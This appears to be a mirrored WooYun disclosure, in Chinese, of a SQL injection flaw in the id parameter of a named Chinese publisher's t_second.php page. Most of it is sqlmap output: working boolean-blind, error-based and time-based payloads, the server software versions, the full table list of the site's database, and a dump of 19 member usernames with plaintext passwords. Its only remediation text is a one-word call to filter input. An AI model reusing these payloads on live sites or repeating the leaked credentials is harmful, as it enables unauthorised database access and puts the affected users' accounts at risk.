乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2014-10-22: 积极联系厂商并且等待厂商认领中,细节不对外公开 2014-12-06: 厂商已经主动忽略漏洞,细节向公众公开
膜拜猪猪侠,求神器,手工党伤不起·······
1注入点:http://www.sciencep.com/t_second.php?id=798 (GET) (主要是t_second.php文件没过滤)2
sqlmap identified the following injection points with a total of 296 HTTP(s) requests:---Place: GETParameter: id Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: id=798 AND 6024=6024 Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause Payload: id=798 AND (SELECT 5731 FROM(SELECT COUNT(*),CONCAT(0x7164726671,(SELECT (CASE WHEN (5731=5731) THEN 1 ELSE 0 END)),0x7176786971,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) Type: AND/OR time-based blind Title: MySQL < 5.0.12 AND time-based blind (heavy query) Payload: id=798 AND 9246=BENCHMARK(5000000,MD5(0x704e5a66))---web server operating system: Linux CentOS 6.5web application technology: PHP 5.3.3, Apache 2.2.15back-end DBMS: MySQL 5.0available databases [3]:[*] information_schema[*] sciencep_db[*] test
3
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Place: GETParameter: id Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: id=798 AND 6024=6024 Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause Payload: id=798 AND (SELECT 5731 FROM(SELECT COUNT(*),CONCAT(0x7164726671,(SELECT (CASE WHEN (5731=5731) THEN 1 ELSE 0 END)),0x7176786971,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) Type: AND/OR time-based blind Title: MySQL < 5.0.12 AND time-based blind (heavy query) Payload: id=798 AND 9246=BENCHMARK(5000000,MD5(0x704e5a66))---web server operating system: Linux CentOS 6.5web application technology: PHP 5.3.3, Apache 2.2.15back-end DBMS: MySQL 5.0Database: sciencep_db[158 tables]+-----------------------------+| 1discountrate || 2order || 3orderdetail || admininfo || article_t || ci_sessions || classification || column_t || daorushujibiao || department || group_list || hxhd_addon15 || hxhd_addonarticle || hxhd_addonflash || hxhd_addonimages || hxhd_addonsoft || hxhd_addonspec || hxhd_admin || hxhd_admintype || hxhd_arcatt || hxhd_archives || hxhd_arcrank || hxhd_arctype || hxhd_area || hxhd_articles || hxhd_banbenshuomingku || hxhd_banciku || hxhd_baseinfo || hxhd_bianjiku || hxhd_bianjishuleiku || hxhd_bianjizhichengku || hxhd_bianjizhiwuku || hxhd_cengciku || hxhd_channeltype || hxhd_chubanzheku || hxhd_co_dataswitch || hxhd_co_exrule || hxhd_co_listenurl || hxhd_co_mediaurl || hxhd_congshuku || hxhd_conote || hxhd_courl || hxhd_dianjipaihangbang || hxhd_dianxiaofenlei || hxhd_dianxiaoleibie || hxhd_dianxiaopaihangbang || hxhd_dianxiaopaihangyiju || hxhd_dingdanku || hxhd_dingweishuomingku || hxhd_download || hxhd_duixiangquntiku || hxhd_duzheduixiangku || hxhd_error || hxhd_feedback || hxhd_flink || hxhd_flinktype || hxhd_freelist || hxhd_friend || hxhd_goushuhuiyuanku || hxhd_goushujingli || hxhd_guanlifenzuku || hxhd_guestbook || hxhd_homepageset || hxhd_huiyuanjibieku || hxhd_huojiangku || hxhd_jgkinfo || hxhd_jiangxiangku || hxhd_jiaoshihuiyuanku || hxhd_jiaoshijibie || hxhd_jiaoshikuxueke || hxhd_jiaoshizhichengku || hxhd_jiaoyuchengduku || hxhd_jibenxinxi || hxhd_jigouku || hxhd_jingxiaoshangku || hxhd_jxkbook || hxhd_kaibenku || hxhd_kechengxingzhi || hxhd_keywords || hxhd_leader_t || hxhd_log || hxhd_member || hxhd_member_arctype || hxhd_member_flink || hxhd_member_guestbook || hxhd_member_operation || hxhd_member_time || hxhd_member_type || hxhd_memberstow || hxhd_moneycard_record || hxhd_moneycard_type || hxhd_moneyrecord || hxhd_myad || hxhd_mynews || hxhd_mytag || hxhd_partner || hxhd_pinzhongleixing || hxhd_plus || hxhd_positions || hxhd_quickgo || hxhd_readerliuyan || hxhd_recruitments || hxhd_search_keywords || hxhd_sgpage || hxhd_shangbangzuigaoweiciku || hxhd_shenfenku || hxhd_shengfenku || hxhd_shiyueyangshuyuanyin || hxhd_shopsales || hxhd_shoukexinxi || hxhd_shuleiku || hxhd_shupingku || hxhd_softconfig || hxhd_sysconfig || hxhd_syspassport || hxhd_tishiwentiku || hxhd_tougaoku || hxhd_uploads || hxhd_vote || hxhd_xianxuanjiaocaiyuanyin || hxhd_xiazaiku || hxhd_xiazaileixingku || hxhd_xuekeku || hxhd_xueliku || hxhd_yizhezerenshuomingku || hxhd_yuanbanciku || hxhd_zaitixingtaiku || hxhd_zdxmjd || hxhd_zengyangshuku || hxhd_zhengwenyuzhongku || hxhd_zhichengku || hxhd_zhiwuku || hxhd_zhongdaxianmu || hxhd_zhongtufafenlei || hxhd_zhuangzhenku || hxhd_zhuyifangshiku || hxhd_zidingyifenlei || hxhd_zuoyizheku || hxhd_zuozhezerenshuomingku || iso_bookinfo_t || iso_booktype_t || log_book || mail_group || mail_list || mail_template || mpshop_tongbu || phpqadmin || phpqanswer || phpqquestion || phpqsession || phpqsurvey || phpquser || remit || sendfee || shouyechangxiaotushubiao || shouyexianshibiao || udf_temp || user_t |+-----------------------------+
4
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Place: GETParameter: id Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: id=798 AND 6024=6024 Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause Payload: id=798 AND (SELECT 5731 FROM(SELECT COUNT(*),CONCAT(0x7164726671,(SELECT (CASE WHEN (5731=5731) THEN 1 ELSE 0 END)),0x7176786971,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) Type: AND/OR time-based blind Title: MySQL < 5.0.12 AND time-based blind (heavy query) Payload: id=798 AND 9246=BENCHMARK(5000000,MD5(0x704e5a66))---web server operating system: Linux CentOS 6.5web application technology: PHP 5.3.3, Apache 2.2.15back-end DBMS: MySQL 5.0Database: sciencep_dbTable: hxhd_member[19 entries]+----------------+-----------+| pwd | uname |+----------------+-----------+| 102030 | asdf1234 || 111 | das || 111 | hfkjsdhkj || 111111 | 1212313 || 123456 | qwdsa || 123456 | 1234441 || 1310530 | dsfdsf || 1310530 | dsffd || aaa | aaa || aaaaaa | aassas || aaaaaa | dssdssds || fengzi | jfsldk || fengzi | jfdksl || fengzi | dfsjkl || hahaha | ga || hahaha | haha || ttttianttttian | ttttian || wltcyb | aaa || zcx | zcx |+----------------+-----------+
过滤
未能联系到厂商或者厂商积极拒绝